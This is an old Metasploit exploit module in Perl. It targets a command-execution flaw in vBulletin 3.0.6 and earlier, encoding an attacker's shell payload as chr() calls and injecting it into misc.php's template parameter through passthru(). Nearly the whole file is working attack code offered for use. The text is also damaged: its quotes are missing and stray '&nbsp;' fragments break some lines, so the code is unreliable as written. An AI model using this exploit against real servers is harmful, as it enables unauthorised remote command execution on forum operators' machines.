##
# Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit
# Name: php_vb3_0_6.pm
# License: Artistic/BSD/GPL
# Info: trying to get the command execution exploits out of the way on milw0rm.com. Ms are always good.
#
#
# - This is an exploit module for the Metasploit Framework, please see
# http://metasploit.com/project s/Framework for more information.
##
package Msf::Exploit::php_vb3_0_6;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;
my $advanced = { };
my $info = {
Name => vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit,
Version => $Revision: 1.0 $,
Authors => [ str0ke ],
Arch => [ ],
OS => [ ],
Priv => 0,
UserOpts =>
{
RHOST => [1, ADDR, The target address],
RPORT => [1, PORT, The target port, 80],
VHOST => [0, DATA, The virtual host name of the server],
RPATH => [1, DATA, Path to the misc.php script, /forum/misc.php],
SSL => [0, BOOL, Use SSL],
},
Description => Pex::Text::Freeform(qq{
This module exploits a code execution flaw in vBulletin <= 3.0.6.
}),
Refs =>
[
[MIL, 832],
],
Payload =>
{
Space => 512,
Keys => [cmd, cmd_bash],
},
Keys => [vBulletin],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({Info => $info, Advanced => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar(RHOST);
my $target_port = $self->GetVar(RPORT);
my $vhost = $self->GetVar(VHOST) || $target_host;
my $path & nbsp; = $self->GetVar(RPATH);
my $cmd &n bsp; = $self->GetVar(EncodedPayload)->RawPayload;
# Encode the command as a set of chr() function calls
my $byte = join(., map { $_ = chr(.$_.) } unpack(C*, $cmd));
# Create the get request data
my $data = "?do=page&template={\${passthru($byte)}}";
my $req =
"GET $path$data HTTP/1.1\r\n".
"Host: $vhost:$target_port\r\n".
"Content-Type: application/html\r\n".
"Content-Length: ". length($data)."\r\n".
"Connection: Close\r\n".
"\r\n";
my $s = Msf::Socket::Tcp->new(
PeerAddr => $target_host,
PeerPort => $target_port,
LocalPort => $self->GetVar(CPORT),
SSL => $self->GetVar(SSL),
);
if ($s->IsError){
$self->PrintLine([*] Error creating socket: . $s->GetError);
return;
}
$self->PrintLine("[*] Sending the malicious vBulletin Get request...");
$s->Send($req);
my $results = $s->Recv(-1, 20);
$s->Close();
return;
}
1;
|